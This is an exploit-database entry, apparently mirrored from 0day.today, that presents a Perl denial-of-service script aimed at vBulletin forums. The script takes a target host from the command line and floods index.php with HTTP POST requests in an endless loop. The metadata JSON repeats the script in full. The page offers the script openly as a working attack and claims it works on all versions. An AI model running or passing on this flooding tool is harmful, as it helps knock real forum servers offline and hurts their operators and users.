Search...

vBulletin 0-day Denial Of Service Exploit

2010-04-12T00:00:00

ID 1337DAY-ID-11736
Type zdt
Reporter SeeMe
Modified 2010-04-12T00:00:00

Description

Exploit for multiple platform in category dos / poc

                                        
                                            =========================================
vBulletin 0-day Denial Of Service Exploit
=========================================


             The largest Exploit Database in the world !


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                         
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Site            : Inj3ct0r.com


# DOS Vbulletin 93% works..
#
# It works on all versions! can DOS server!
#
#Perl Script
use Socket;
if (@ARGV &lt; 2) { &usage }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i&lt;10; $i--)
{
$user="vb".$rand.$i;
$data = "s="
;
$len = length $data;
$foo = "POST ".$dir."index.php HTTP/1.1\r\n".
"Accept: * /*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+" ;
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 /\n\n";
exit();
};
################################################################
# Greetz to SeeMe - Mr,Mo0om
# Thanks to Islamic Ghosts Team exploit-db and inj3ct0r.com



#  0day.today [2018-03-09]  #

JSON Vulners Source

Initial Source

{"published": "2010-04-12T00:00:00", "id": "1337DAY-ID-11736", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for multiple platform in category dos / poc", "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-03-09T16:09:30", "rev": 2}, "dependencies": {"references": [], "modified": "2018-03-09T16:09:30", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "lastseen": "2018-03-09T16:09:30", "edition": 2, "title": "vBulletin 0-day Denial Of Service Exploit", "href": "https://0day.today/exploit/description/11736", "modified": "2010-04-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/11736", "references": [], "reporter": "SeeMe", "sourceData": "=========================================\r\nvBulletin 0-day Denial Of Service Exploit\r\n=========================================\r\n\r\n\r\n The largest Exploit Database in the world !\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 \r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 0\r\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1\r\n\r\n#[+] Site : Inj3ct0r.com\r\n\r\n\r\n# DOS Vbulletin 93% works..\r\n#\r\n# It works on all versions! can DOS server!\r\n#\r\n#Perl Script\r\nuse Socket;\r\nif (@ARGV < 2) { &usage }\r\n$rand=rand(10);\r\n$host = $ARGV[0];\r\n$dir = $ARGV[1];\r\n$host =~ s/(http:\\/\\/)//eg;\r\nfor ($i=0; $i<10; $i--)\r\n{\r\n$user=\"vb\".$rand.$i;\r\n$data = \"s=\"\r\n;\r\n$len = length $data;\r\n$foo = \"POST \".$dir.\"index.php HTTP/1.1\\r\\n\".\r\n\"Accept: * /*\\r\\n\".\r\n\"Accept-Language: en-gb\\r\\n\".\r\n\"Content-Type: application/x-www-form-urlencoded\\r\\n\".\r\n\"Accept-Encoding: gzip, deflate\\r\\n\".\r\n\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\\r\\n\".\r\n\"Host: $host\\r\\n\".\r\n\"Content-Length: $len\\r\\n\".\r\n\"Connection: Keep-Alive\\r\\n\".\r\n\"Cache-Control: no-cache\\r\\n\\r\\n\".\r\n\"$data\";\r\nmy $port = \"80\";\r\nmy $proto = getprotobyname('tcp');\r\nsocket(SOCKET, PF_INET, SOCK_STREAM, $proto);\r\nconnect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;\r\nsend(SOCKET,\"$foo\", 0);\r\nsyswrite STDOUT, \"+\" ;\r\n}\r\nprint \"\\n\\n\";\r\nsystem('ping $host');\r\nsub usage {\r\nprint \"\\tusage: \\n\";\r\nprint \"\\t$0 \\n\";\r\nprint \"\\tex: $0 127.0.0.1 /forum/\\n\";\r\nprint \"\\tex2: $0 127.0.0.1 /\\n\\n\";\r\nexit();\r\n};\r\n################################################################\r\n# Greetz to SeeMe - Mr,Mo0om\r\n# Thanks to Islamic Ghosts Team exploit-db and inj3ct0r.com\r\n\r\n\n\n# 0day.today [2018-03-09] #", "immutableFields": []}